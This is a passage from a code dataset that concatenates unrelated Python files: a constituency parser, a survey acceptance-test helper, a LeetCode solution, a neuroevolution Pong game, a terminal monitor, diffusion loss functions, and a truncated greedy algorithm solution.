context,\n }\n return action\n","repo_name":"oxigensalud/odoo-addons","sub_path":"oxigen_repair/models/product_product.py","file_name":"product_product.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"5644295379","text":"#! /usr/bin/env python\nfrom SparseWeightVector import SparseWeightVector\n\n\"\"\"\nTransition based const. parser (includes tagging)\nScored with beam search and perceptron.\n\"\"\"\n\nclass ConsTree:\n\n def __init__(self,label,children=None):\n self.label = label\n self.children = [] if children is None else children\n\n def is_leaf(self):\n return self.children == []\n \n def add_child(self,child_node):\n self.children.append(child_node)\n \n def arity(self):\n return len(self.children)\n \n def get_child(self,idx=0):\n \"\"\"\n returns the ith child of this node\n \"\"\"\n return self.children[idx]\n\n def __str__(self):\n \"\"\"\n pretty prints the tree\n \"\"\"\n return self.label if self.is_leaf() else '(%s %s)'%(self.label,' '.join([str(child) for child in self.children]))\n\n def tokens(self,labels=True):\n \"\"\"\n @param labels: returns a list of strings if true else returns\n a list of ConsTree objects\n @return the list of words at the leaves of the tree\n \"\"\"\n if self.is_leaf():\n return [self.label] if labels else [self]\n else:\n result = []\n for child in self.children:\n result.extend(child.tokens(labels))\n return result\n \n def index_leaves(self):\n \"\"\"\n Adds an numeric index to each leaf node\n \"\"\"\n for idx,elt in enumerate(self.tokens(labels=False)):\n elt.idx = idx\n \n def triples(self):\n \"\"\"\n Extracts a list of evalb triples from the tree\n (supposes leaves are indexed)\n \"\"\"\n if self.is_leaf():\n return [(self.idx,self.idx+1,self.label)]\n else:\n subtriples = []\n for child in self.children:\n subtriples.extend(child.triples())\n leftidx = min([idx for idx,jdx,label in subtriples])\n rightidx = max([jdx for idx,jdx,label in subtriples])\n subtriples.append((leftidx,rightidx,self.label))\n return subtriples\n\n def compare(self,other):\n \"\"\"\n Compares this tree to another and computes precision,recall,\n fscore. Assumes self is the reference tree\n @param other: the predicted tree\n @return (precision,recall,fscore)\n \"\"\"\n self.index_leaves()\n other.index_leaves()\n ref_triples = set(self.triples())\n pred_triples = set(other.triples())\n intersect = ref_triples.intersection(pred_triples)\n isize = len(intersect)\n P = isize/len(pred_triples)\n R = isize/len(ref_triples)\n F = (2*P*R)/(P+R)\n return (P,R,F)\n\n \n def close_unaries(self,dummy_annotation='$'):\n \"\"\"\n In place (destructive) unary closure of unary branches\n \"\"\"\n if self.arity() == 1:\n current = self\n unary_labels = []\n while current.arity() == 1 and not current.get_child().is_leaf():\n unary_labels.append(current.label)\n current = current.get_child()\n unary_labels.append(current.label)\n self.label = dummy_annotation.join(unary_labels)\n self.children = current.children\n \n for child in self.children:\n child.close_unaries()\n\n def expand_unaries(self,dummy_annotation='$'):\n \"\"\"\n In place (destructive) expansion of unary symbols.\n \"\"\"\n if dummy_annotation in self.label:\n unary_chain = self.label.split(dummy_annotation)\n self.label = unary_chain[0]\n backup = self.children\n current = self\n for label in unary_chain[1:]:\n c = ConsTree(label)\n current.children = [c] \n current = c\n current.children = backup\n \n for child in self.children:\n child.expand_unaries()\n\n \n def left_markovize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) left markovization (order 0)\n \"\"\"\n if len(self.children) > 2:\n left_sequence = self.children[:-1]\n dummy_label = self.label if self.label[-1] == dummy_annotation else self.label+dummy_annotation\n dummy_tree = ConsTree(dummy_label, left_sequence)\n self.children = [dummy_tree,self.children[-1]]\n for child in self.children:\n child.left_markovize()\n\n def right_markovize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) right markovization (order 0)\n \"\"\"\n if len(self.children) > 2:\n right_sequence = self.children[1:]\n dummy_label = self.label if self.label[-1] == dummy_annotation else self.label+dummy_annotation\n dummy_tree = ConsTree(dummy_label, right_sequence)\n self.children = [self.children[0],dummy_tree]\n for child in self.children:\n child.right_markovize()\n\n def unbinarize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) unbinarization\n \"\"\"\n newchildren = []\n for child in self.children:\n if child.label[-1] == dummy_annotation:\n child.unbinarize()\n newchildren.extend(child.children)\n else:\n child.unbinarize()\n newchildren.append(child)\n self.children = newchildren\n\n def collect_nonterminals(self):\n \"\"\"\n Returns the list of nonterminals found in a tree:\n \"\"\"\n if not self.is_leaf():\n result = [self.label]\n for child in self.children:\n result.extend(child.collect_nonterminals())\n return result\n return []\n\n @staticmethod\n def read_tree(input_str):\n \"\"\"\n Reads a one line s-expression.\n This is a non robust function to syntax errors\n @param input_str: a s-expr string\n @return a ConsTree object\n \"\"\"\n tokens = input_str.replace('(',' ( ').replace(')',' ) ').split()\n stack = [ConsTree('dummy')]\n for idx,tok in enumerate(tokens):\n if tok == '(':\n current = ConsTree(tokens[idx+1])\n stack[-1].add_child(current)\n stack.append(current)\n elif tok == ')':\n stack.pop()\n else:\n if tokens[idx-1] != '(':\n stack[-1].add_child(ConsTree(tok))\n assert(len(stack) == 1)\n return stack[-1].get_child()\n\n\nclass ConstituentTransitionParser:\n\n SHIFT = \"S\"\n REDUCE = \"R\"\n STOP = \"!\"\n \n def __init__(self):\n self.model = SparseWeightVector()\n self.nonterminals = []\n\n def static_oracle(self,stack,buffer,ref_triples):\n \"\"\"\n Returns the action to do given a configuration and a ref parse tree\n @param ref_triples : the triples from the reference tree\n @param stack: the config stack\n @param buffer: a list of integers\n @return a couple (parse action, action param)\n \"\"\"\n if len(stack) >= 2:\n (i,k,X1),(k,j,X2) = stack[-2],stack[-1]\n for X in self.nonterminals:\n if (i,j,X) in ref_triples:\n return (ConstituentTransitionParser.REDUCE,X)\n if buffer:\n idx = buffer[0]\n for tag in self.nonterminals:\n if(idx,idx+1,tag) in ref_triples:\n return (ConstituentTransitionParser.SHIFT,tag)\n return (ConstituentTransitionParser.STOP,ConstituentTransitionParser.STOP)\n\n \n def reference_derivation(self,ref_tree):\n \"\"\"\n Returns a reference derivation given a reference tree\n @param ref_tree: a ConsTree\n \"\"\"\n ref_tree.index_leaves()\n ref_triples = set(ref_tree.triples())\n sentence = ref_tree.tokens()\n N = len(sentence)\n\n action = (None,None)\n c = (tuple(),tuple(range(N)),0.0)\n derivation = [(action,c)]\n \n for t in range(2*N):#because 2N-1+terminate\n S,B,score = c\n action,param = self.static_oracle(S,B,ref_triples)\n if action == ConstituentTransitionParser.REDUCE:\n c = self.reduce(c,param,sentence)\n elif action == ConstituentTransitionParser.SHIFT:\n c = self.shift(c,param,sentence)\n else:\n c = self.terminate(c,sentence)\n derivation.append(((action,param),c))\n return derivation\n\n\n def build_tree(self,derivation,sentence):\n \"\"\"\n Builds a ConsTree from a parse derivation\n @param derivation: a parse derivation\n @param sentence: a list of tokens\n @return a ConsTree\n \"\"\"\n tree_stack = [ ]\n for (action,param) , C in derivation:\n S,B,score = C \n if action == ConstituentTransitionParser.SHIFT:\n i,j,lbl = S[-1]\n tag_node = ConsTree(param)\n leaf_node = ConsTree(sentence[i])\n tag_node.add_child(leaf_node)\n tree_stack.append(tag_node)\n elif action == ConstituentTransitionParser.REDUCE:\n root_node = ConsTree(param)\n rnode = tree_stack.pop()\n lnode = tree_stack.pop()\n root_node.children = [lnode,rnode]\n tree_stack.append(root_node)\n return tree_stack[-1]\n \n def reduce(self,C,param,sentence):\n \"\"\"\n Performs a reduction from the current configuration and returns the result\n @param S: a stack\n @param B: a buffer\n @param param: the category for reduction\n @return a configuration\n \"\"\"\n S,B,score = C\n i,k,_ = S[-2]\n k,j,_ = S[-1]\n return (S[:-2]+((i,j,param),),B,score+self.score(C,(ConstituentTransitionParser.REDUCE,param),sentence))\n \n def shift(self,C,param,sentence):\n \"\"\"\n Performs a reduction from the current configuration and returns the result\n @param S: a stack\n @param B: a buffer\n @param param: the category for reduction\n @return a configuration\n \"\"\"\n S,B,score = C\n idx = S[-1][1] if S else 0\n return (S+((idx,idx+1,param),),B[1:],score+self.score(C,(ConstituentTransitionParser.SHIFT,param),sentence))\n \n def terminate(self,C,sentence):\n \"\"\"\n Performs a stop action returns the result\n \"\"\"\n S,B,score = C\n return (S,B,score+self.score(C,(ConstituentTransitionParser.STOP,ConstituentTransitionParser.STOP),sentence))\n \n\n def score(self,configuration,action,tokens):\n \"\"\"\n Computes the prefix score of a derivation\n @param configuration : a triple (S,B,score)\n @param action: an action label \n @param tokens: the x-sequence of tokens to be parsed\n @return a prefix score\n \"\"\"\n S,B,old_score = configuration\n config_repr = self.__make_config_representation(S,B,tokens)\n return old_score + self.model.dot(config_repr,action)\n\n def __make_config_representation(self,S,B,tokens):\n \"\"\"\n This gathers the information for coding the configuration as a feature vector.\n @param S: a configuration stack\n @param B a configuration buffer\n @return an ordered list of tuples \n \"\"\"\n #default values for inaccessible positions\n s0cat,s1cat,s0l,s0r,s1l,s1r,b0,b1,b2 = \"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\"\n \n if len(S) > 0:\n i,j,lbl = S[-1]\n s0l,s0r,s0cat = tokens[i],tokens[j-1],lbl\n if len(S) > 1:\n i,j,lbl = S[-2]\n s1l,s1r,s1cat = tokens[i],tokens[j-1],lbl\n if len(B) > 0:\n b0 = tokens[B[0]]\n if len(B) > 1:\n b1 = tokens[B[1]]\n if len(B) > 2:\n b2 = tokens[B[2]]\n\n wordlist = [s0l,s0r,s1l,s1r,b0,b1,b2]\n catlist = [s0cat,s1cat,b0]\n word_bigrams = list(zip(wordlist,wordlist[1:]))\n word_trigrams = list(zip(wordlist,wordlist[1:],wordlist[2:]))\n cat_bigrams = list(zip(catlist,catlist[1:]))\n \n return word_bigrams + word_trigrams + cat_bigrams\n\n\n def transform(self,dataset,left_markov = True):\n \"\"\"\n In place (destructive) conversion of a treebank to Chomsky Normal Form.\n Builds the list of the parser nonterminals as a side effect\n and indexes references trees.\n \n @param dataset a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n \"\"\"\n all_nonterminals = set()\n for tree in dataset:\n tree.close_unaries()\n if left_markov:\n tree.left_markovize()\n else:\n tree.right_markovize()\n all_nonterminals.update(tree.collect_nonterminals()) \n self.nonterminals = list(all_nonterminals)\n \n def parse_one(self,sentence,beam_size=4,get_beam=False,deriv=False,untransform=True):\n \"\"\"\n @param sentence: a list of strings\n @param beam_size: size of the beam\n @param get_beam : returns the beam instead of tree like structures\n @param deriv: returns the derivation instead of the parse tree\n @param untransform: bool if true unbinarizes the resulting tree.\n \"\"\"\n \n actions = [ConstituentTransitionParser.SHIFT,\\\n ConstituentTransitionParser.REDUCE,\\\n ConstituentTransitionParser.STOP]\n all_actions = list([(a,p) for a in actions for p in self.nonterminals])\n \n N = len(sentence)\n init = (tuple(),tuple(range(N)),0.0) #A config is a hashable triple with score \n current_beam = [(-1,(None,None),init)]\n beam = [current_beam]\n \n for i in range(2*N): #because 2*N-1+terminate\n next_beam = []\n for idx, ( _ ,action,config) in enumerate(current_beam):\n S,B,score = config \n for (a,p) in all_actions:\n if a == ConstituentTransitionParser.SHIFT:\n if B:\n newconfig = self.shift(config,p,sentence)\n next_beam.append((idx,(a,p),newconfig))\n elif a == ConstituentTransitionParser.REDUCE:\n if len(S) >= 2:\n newconfig = self.reduce(config,p,sentence)\n next_beam.append((idx,(a,p),newconfig))\n elif a == ConstituentTransitionParser.STOP:\n if len(S) < 2 and not B:\n newconfig = self.terminate(config,sentence)\n next_beam.append((idx,(a,a),newconfig))\n next_beam.sort(key=lambda x:x[2][2],reverse=True)\n next_beam = next_beam[:beam_size]\n beam.append(next_beam)\n current_beam = next_beam\n \n if get_beam:\n return beam\n else:\n #Backtrace for derivation\n idx = 1\n prev_jdx = 0\n derivation = []\n while prev_jdx != -1:\n current = beam[-idx][prev_jdx]\n prev_jdx,prev_action,C = current\n derivation.append((prev_action,C))\n idx += 1\n derivation.reverse()\n if deriv:\n return derivation\n else:\n result = self.build_tree(derivation,sentence)\n if untransform:\n result.unbinarize()\n result.expand_unaries()\n return result\n\n def early_prefix(self,ref_parse,beam):\n \"\"\"\n Finds the prefix for early update, that is the prefix where the ref parse fall off the beam.\n @param ref_parse: a parse derivation\n @param beam: a beam output by the parse_one function\n @return (bool, ref parse prefix, best in beam prefix)\n the bool is True if update required false otherwise\n \"\"\"\n idx = 0\n for (actionR,configR),(beamCol) in zip(ref_parse,beam):\n found = False\n for source_idx,action,configTarget in beamCol:\n if action == actionR and configTarget[:-1] == configR[:-1]: #-1 -> does not test score equality\n found = True\n break\n if not found:\n #backtrace\n jdx = idx\n source_idx = 0\n early_prefix = []\n while jdx >= 0:\n new_source_idx,action,config = beam[jdx][source_idx]\n early_prefix.append( (action,config))\n source_idx = new_source_idx\n jdx -= 1\n early_prefix.reverse()\n return (True, ref_parse[:idx+1],early_prefix)\n idx+=1\n #if no error found check that the best in beam is the ref parse\n last_ref_action,last_ref_config = ref_parse[-1]\n _,last_pred_action,last_pred_config = beam[-1][0]\n if last_pred_config[:-1] == last_ref_config[:-1]:\n return (False,None,None) #returns a no update message\n else:#backtrace\n jdx = len(beam)-1\n source_idx = 0\n early_prefix = []\n while jdx >= 0:\n new_source_idx,action,config = beam[jdx][source_idx]\n early_prefix.append( (action,config) )\n source_idx = new_source_idx\n jdx -= 1\n early_prefix.reverse()\n return (True,ref_parse,early_prefix)\n \n\n def test(self,treebank,beam_size=4):\n \"\"\" \n @param treebank a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n @return the avg f-score\n \"\"\"\n Fscores = []\n for tree in treebank:\n result = self. parse_one(tree.tokens(),beam_size)\n print(result)\n P,R,F = tree.compare(result)\n Fscores.append(F)\n return sum(Fscores)/len(Fscores)\n \n def train(self,treebank,step_size=1.0,max_epochs=100,beam_size=4,left_markov=True):\n \"\"\" \n @param treebank a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n \"\"\"\n self.transform(treebank,left_markov)\n dataset = list([(tree.tokens(),self.reference_derivation(tree)) for tree in treebank])\n N = len(dataset)\n for e in range(max_epochs):\n loss = 0.0\n for sentence,ref_derivation in dataset:\n pred_beam = (self.parse_one(sentence,get_beam=True))\n (update, ref_prefix,pred_prefix) = self.early_prefix(ref_derivation,pred_beam)\n if update:\n loss += 1.0\n delta_ref = SparseWeightVector()\n current_config = ref_prefix[0][1]\n for action,config in ref_prefix[1:]:\n S,B,score = current_config\n x_repr = self.__make_config_representation(S,B,sentence)\n delta_ref += SparseWeightVector.code_phi(x_repr,action)\n current_config = config\n \n delta_pred = SparseWeightVector()\n current_config = pred_prefix[0][1]\n for action,config in pred_prefix[1:]:\n S,B,score = current_config\n x_repr = self.__make_config_representation(S,B,sentence)\n delta_pred += SparseWeightVector.code_phi(x_repr,action)\n current_config = config\n\n self.model += step_size*(delta_ref-delta_pred)\n \n print('Loss = ',loss, \"%Exact match = \",(N-loss)/N)\n if loss == 0.0:\n return\n\n \n \nx = ConsTree.read_tree('(S (NP (D le) (N chat)) (VN (V mange)) (NP (D la) (N souris)) (PP (P sur) (NP (D le) (N paillasson))) (PONCT .))')\ny = ConsTree.read_tree('(S (NP (D la) (N souris)) (VN (V dort)) (PONCT .))')\nz = ConsTree.read_tree('(S (NP (D le) (N cuisinier)) (VN (V mange)) (NP (D une) (N salade) (PP (P avec) (NP (D des) (N cornichons)))) (PONCT .))')\n\nparser = ConstituentTransitionParser()\nparser.train([x,y,z])\n\nx = ConsTree.read_tree('(S (NP (D le) (N chat)) (VN (V mange)) (NP (D la) (N souris)) (PP (P sur) (NP (D le) (N paillasson))) (PONCT .))')\ny = ConsTree.read_tree('(S (NP (D la) (N souris)) (VN (V dort)) (PONCT .))')\nz = ConsTree.read_tree('(S (NP (D le) (N cuisinier)) (VN (V mange)) (NP (D une) (N salade) (PP (P avec) (NP (D des) (N cornichons)))) (PONCT .))')\n\n\nprint(parser.test([x,y,z]))\n","repo_name":"bencrabbe/parsing-at-diderot","sub_path":"const_transition.py","file_name":"const_transition.py","file_ext":"py","file_size_in_byte":21088,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"35485078512","text":"from datetime import datetime\nfrom functools import partial\nfrom typing import Mapping\n\nimport requests\n\nfrom acceptance_tests.utilities.pubsub_helper import get_matching_pubsub_message_acking_others\nfrom acceptance_tests.utilities.test_case_helper import test_helper\nfrom config import Config\n\n\ndef add_survey(sample_validation_rules, test_start_time, sample_definition_url=\"http://foo.bar.json\",\n sample_has_header_row=True, sample_file_separator=','):\n survey_name = 'test survey ' + datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n\n url = f'{Config.SUPPORT_TOOL_API}/surveys'\n\n body = {\"name\": survey_name,\n \"sampleValidationRules\": sample_validation_rules,\n \"sampleWithHeaderRow\": sample_has_header_row,\n \"sampleSeparator\": sample_file_separator,\n \"sampleDefinitionUrl\": sample_definition_url,\n \"metadata\": {'foo': 'bar'}}\n\n response = requests.post(url, json=body)\n response.raise_for_status()\n\n survey_id = response.json()\n\n survey_update_event = get_emitted_survey_update(survey_name, test_start_time)\n test_helper.assertEqual(survey_update_event['name'], survey_name,\n 'Unexpected survey name')\n\n test_helper.assertEqual(survey_update_event['sampleDefinitionUrl'], sample_definition_url,\n 'Unexpected sample definition URL')\n\n test_helper.assertEqual(survey_update_event['metadata'], {'foo': 'bar'},\n 'Unexpected metadata')\n\n return survey_id\n\n\ndef get_emitted_survey_update(expected_survey_name, test_start_time):\n # Build the matcher with the current expected survey name\n survey_name_matcher = partial(_survey_name_message_matcher, expected_survey_name=expected_survey_name)\n\n message_received = get_matching_pubsub_message_acking_others(Config.PUBSUB_OUTBOUND_SURVEY_SUBSCRIPTION,\n survey_name_matcher, test_start_time)\n\n return message_received['payload']['surveyUpdate']\n\n\ndef _survey_name_message_matcher(message: Mapping, expected_survey_name=None) -> (bool, str):\n if message['payload']['surveyUpdate']['name'] == expected_survey_name:\n return True, ''\n return False, f'Actual survey name \"{message[\"payload\"][\"surveyUpdate\"][\"name\"]}\" ' \\\n f'does not match expected \"{expected_survey_name}\"'\n","repo_name":"ONSdigital/ssdc-rm-acceptance-tests","sub_path":"acceptance_tests/utilities/survey_helper.py","file_name":"survey_helper.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22473868624","text":"import unittest\n\ndata = ((\"aA\", \"aAAbbbb\", 3), (\"z\", \"ZZ\", 0))\n\n\nclass Solution:\n def numJewelsInStones(self, jewels: str, stones: str) -> int:\n jewels_set = set(jewels)\n jewels_count = 0\n for s in stones:\n if s in jewels_set:\n jewels_count += 1\n return jewels_count\n\n\nclass TestCase(unittest.TestCase):\n def test_solution(self):\n s = Solution()\n\n for jewels, stones, expected in data:\n self.assertEqual(s.numJewelsInStones(jewels, stones), expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cybernextgen/leetcode","sub_path":"easy/771-jewels-and-stones.py","file_name":"771-jewels-and-stones.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28147215907","text":"import numpy.random as nprand\nimport pygame\nfrom ball import Ball\nfrom paddle import Paddle\n\nclass Pong:\n def __init__(self):\n pygame.init()\n self.font = pygame.font.SysFont('Comic Sans MS', 30)\n self.screen = pygame.display.set_mode([1820, 980])\n self.screenWidth = self.screen.get_width()\n self.screenHeight = self.screen.get_height()\n\n self.simSpeed = 3\n\n self.population = []\n self.balls = []\n self.previousPopulation = []\n self.populationSize = 256\n self.averageFitnessHistory = []\n self.maximumScoreHistory = []\n self.maximumHitsHistory = []\n\n self.createPopulation()\n self.createBalls()\n self.generation = 1\n\n self.running = True\n self.drawAll = True\n self.gameLoop()\n pass\n\n def createPopulation(self):\n for i in range(self.populationSize):\n paddle = Paddle(self.screen)\n self.population.append(paddle)\n return self.population\n\n def createBalls(self):\n for i in range(self.populationSize):\n ball = Ball(self.screen, self.simSpeed)\n self.balls.append(ball)\n return self.balls\n\n def evaluateFitness(self):\n sumScore = 0\n sumHits = 0\n for paddle in self.previousPopulation:\n sumScore += paddle.timeUnderBall\n sumHits += paddle.ballHits\n for paddle in self.previousPopulation:\n paddle.fitness = ((paddle.timeUnderBall * paddle.ballHits) + (15000 / paddle.distanceFromBall)) ** 2\n pass\n\n def calculateStatistics(self):\n totalFitness = 0\n maximumScore = 0\n maximumHits = 0\n for paddle in self.previousPopulation:\n if paddle.timeUnderBall > maximumScore:\n maximumScore = paddle.timeUnderBall\n if paddle.ballHits > maximumHits:\n maximumHits = paddle.ballHits\n totalFitness += paddle.fitness\n self.averageFitnessHistory.append(totalFitness/len(self.previousPopulation))\n self.maximumScoreHistory.append(maximumScore)\n self.maximumHitsHistory.append(maximumHits)\n pass \n\n #build the next generation\n def nextGeneration(self):\n self.evaluateFitness()\n self.calculateStatistics()\n for i in range(self.populationSize):\n parent1 = self.selectRandomBiasedParent()\n parent2 = self.selectRandomBiasedParent()\n child = self.crossover(parent1, parent2, 1)\n \n # parent1 = self.selectFittestParent()\n # child = self.crossover(parent1, parent1, 1)\n if nprand.random() < 0.75:\n child.brain.mutate(0.1)\n self.population.append(child)\n self.createBalls()\n print(\"Average Fitness: \", self.averageFitnessHistory[-5:])\n print(\"Maximum Score: \", self.maximumScoreHistory[-5:])\n print(\"Maximum Hits: \", self.maximumHitsHistory[-5:])\n\n\n def selectRandomBiasedParent(self, k=3):\n\t# first random selection\n index = nprand.randint(len(self.previousPopulation))\n for i in nprand.randint(0, len(self.previousPopulation), k-1):\n # check if better (e.g. perform a tournament)\n if self.previousPopulation[i].fitness > self.previousPopulation[index].fitness:\n index = i\n return self.previousPopulation[index]\n\n def selectFittestParent(self):\n maxFitness = 0\n fittestPaddle = self.previousPopulation[0]\n for paddle in self.previousPopulation:\n if paddle.fitness > maxFitness:\n maxFitness = paddle.fitness\n fittestPaddle = paddle\n return fittestPaddle\n\n def crossover(self, parent1, parent2, crossoverRate):\n child = Paddle(self.screen)\n for layer in range(len(child.brain.layers)):\n for row in range(len(child.brain.layers[layer].weights)):\n for weight in range(len(child.brain.layers[layer].weights[row])):\n if nprand.random() < crossoverRate:\n child.brain.layers[layer].weights[row][weight] = parent1.brain.layers[layer].weights[row][weight]\n else:\n child.brain.layers[layer].weights[row][weight] = parent2.brain.layers[layer].weights[row][weight]\n return child\n\n def update(self):\n if len(self.population) <= 0:\n self.nextGeneration()\n self.generation += 1\n self.previousPopulation = []\n print(\"Generation: \", self.generation)\n else:\n toRemove = []\n for i in range(len(self.population)):\n paddle = self.population[i]\n ball = self.balls[i]\n if not ball.checkBallPos():\n self.previousPopulation.append(paddle)\n paddle.distanceFromBall = abs(ball.xPos - paddle.pos)\n toRemove.append(i)\n ball.updatePosition()\n paddle.collisionCheck(ball)\n prediction = paddle.think([[paddle.pos / self.screenWidth],[ball.xPos / self.screenWidth],[ball.yPos / self.screenHeight], [ball.xVel], [ball.yVel]])\n if prediction == 0:\n paddle.move(1)\n elif prediction == 2:\n paddle.move(-1)\n pass\n self.population = [paddle for paddle in self.population if self.population.index(paddle) not in toRemove]\n self.balls = [ball for ball in self.balls if self.balls.index(ball) not in toRemove]\n \n\n def draw(self):\n self.screen.fill((255,255,255))\n if (self.drawAll):\n for i in range(len(self.population)):\n self.population[i].draw()\n self.balls[i].draw()\n else:\n self.population[-1].draw()\n self.balls[-1].draw()\n pass\n\n def gameLoop(self):\n while self.running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_2:\n self.simSpeed = 5 if self.simSpeed >= 4.5 else self.simSpeed + 0.5\n print(self.simSpeed)\n for paddle in self.population:\n paddle.speed = self.simSpeed\n for ball in self.balls:\n ball.speed = self.simSpeed\n pass\n if event.key == pygame.K_1:\n self.simSpeed = 0 if self.simSpeed <= 0.5 else self.simSpeed - 0.5\n print(self.simSpeed)\n for paddle in self.population:\n paddle.speed = self.simSpeed\n for ball in self.balls:\n ball.speed = self.simSpeed\n if event.key == pygame.K_r:\n for ball in self.balls:\n self.balls = []\n for paddle in self.population:\n paddle.distanceFromBall = 500\n self.previousPopulation.append(paddle)\n self.population = []\n\n self.update()\n if (len(self.population) > 0):\n if (self.generation % 1 == 0):\n self.draw()\n pygame.display.flip()\n \n\n\ngame = Pong()","repo_name":"frankpeckover/pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":7582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34969470073","text":"import mubeaSlipSimulator as ms\nfrom datetime import datetime\nimport os\nimport plotext as plt\n\n\ndef monitorRuns(runs: int, d: ms.MeasurementStore, refresh_ms: int):\n labels = []\n velocities_f = []\n velocities_r = []\n delta = []\n\n values = d.getLast(runs)\n for v in values:\n id, data = v\n labels.append(datetime.strptime(data.get('date'), \"%Y-%m-%d %H:%M:%S.%f\"))\n velocities_f.append(float(data.get('velocity_f')))\n velocities_r.append(float(data.get('velocity_r')))\n\n d = float(data.get('velocity_f')) - float(data.get('velocity_r'))\n delta.append(d)\n\n title = 'Last Runs'\n os.system('cls' if os.name == 'nt' else 'clear')\n plt.clt()\n plt.clf()\n\n dates = plt.datetimes_to_string(labels)\n\n # Set the color of each line based on the velocity_f and velocity_r values\n line_color = \"red\" if velocities_f[-1] < velocities_r[-1] else \"blue\"\n plt.plot(delta, label=\"delta\", yside=\"right\", fillx=True, color=\"gray\")\n plt.plot(velocities_f, label=\"f\", yside=\"left\", color=line_color)\n plt.plot(velocities_r, label=\"r\", yside=\"left\", color=line_color)\n\n plt.interactive(True)\n plt.show()\n\n time.sleep(refresh_ms/1000)\n","repo_name":"Keijukainen311/SlipDetection","sub_path":"monitorTerminal.py","file_name":"monitorTerminal.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73521211529","text":"try:\r\n import cupy as np\r\n is_cupy_available = True\r\nexcept:\r\n import numpy as np\r\n is_cupy_available = False\r\n\r\nfrom diffusion.activations import Sigmoid, Softmax, ReLU, LogSoftmax\r\n\r\n\r\nclass MSE():\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.power(t - y, 2)\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -2 * (t - y) / np.prod(np.asarray(y.shape[1:]))\r\n\r\n\r\nclass BinaryCrossEntropy():\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -(t * np.log(y + 1e-8) + (1 - t) * np.log(1 - y + 1e-8))\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -t / (y + 1e-8) + (1 - t) / (1 - (y + 1e-8))\r\n\r\n\r\nclass CategoricalCrossEntropy():\r\n def __init__(self, ignore_index = None) -> None:\r\n self.ignore_index = ignore_index\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.where(t == self.ignore_index, 0, - t * np.log(y))\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.where(t == self.ignore_index, 0, -t / y)\r\n\r\n\r\nclass CrossEntropy():\r\n def __init__(self, ignore_index = None) -> None:\r\n self.ignore_index = ignore_index\r\n self.log_softmax = LogSoftmax()\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n log_softmax = self.log_softmax.forward(y)\r\n nll_loss = -log_softmax[np.arange(len(t)), t]\r\n \r\n return np.where(t == self.ignore_index, 0, nll_loss)\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n batch_size = y.shape[0]\r\n err = 1/batch_size\r\n nll_loss_der = -1 * np.where(np.isin(y, y[np.arange(len(t)), t]), err, 0).astype(y.dtype)\r\n \r\n output_err = self.log_softmax.jacobian_backward(nll_loss_der)\r\n \r\n return np.where(t.reshape(-1, 1) == self.ignore_index, 0, output_err)\r\n\r\n\r\n\r\n\r\n\r\n\r\nloss_functions = {\r\n \r\n \"mse\": MSE(),\r\n \"binary_crossentropy\": BinaryCrossEntropy(),\r\n \"categorical_crossentropy\": CategoricalCrossEntropy()\r\n\r\n}","repo_name":"AkiRusProd/numpy-diffusion","sub_path":"diffusion/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40979126630","text":"from sys import stdin\nfrom collections import defaultdict\nstdin = open(\"Greedy/input.txt\",'r')\ninput = stdin.readline\n\nn, k = map(int, input().strip().split())\nelect = list(map(int, input().strip().split()))\nresult = 0\n\nin_plug = defaultdict(int)\ns_idx = i = 0\n\nwhile sum(in_plug.values()) < n: # 플러그 개수만큼 우선 사용 차감 반영\n if not in_plug[elect[i]]: # 아직 플러그에 안 꽂은 제품이면\n in_plug[elect[i]] = 1 # 플러그에 사용중 표시\n # 이미 꽂혀있는 제품이면\n s_idx += 1\n i += 1\n if i == k-1:\n break\n\n\nfor i in range(s_idx, len(elect)):\n breaker = False\n if not in_plug[elect[i]]: # 아직 플러그에 안 꽂은 제품이면 무언가 뽑아야 함\n del in_plug[elect[i]]\n # 다음에 안 쓰는 제품이 꽂혀있으면 먼저 뽑는다.\n for e in in_plug.keys():\n if e not in elect[i+1:]:\n del in_plug[e]\n result += 1 \n in_plug[elect[i]] = 1\n now = i\n breaker = True\n break\n \n if not breaker:\n # 모두 다음에도 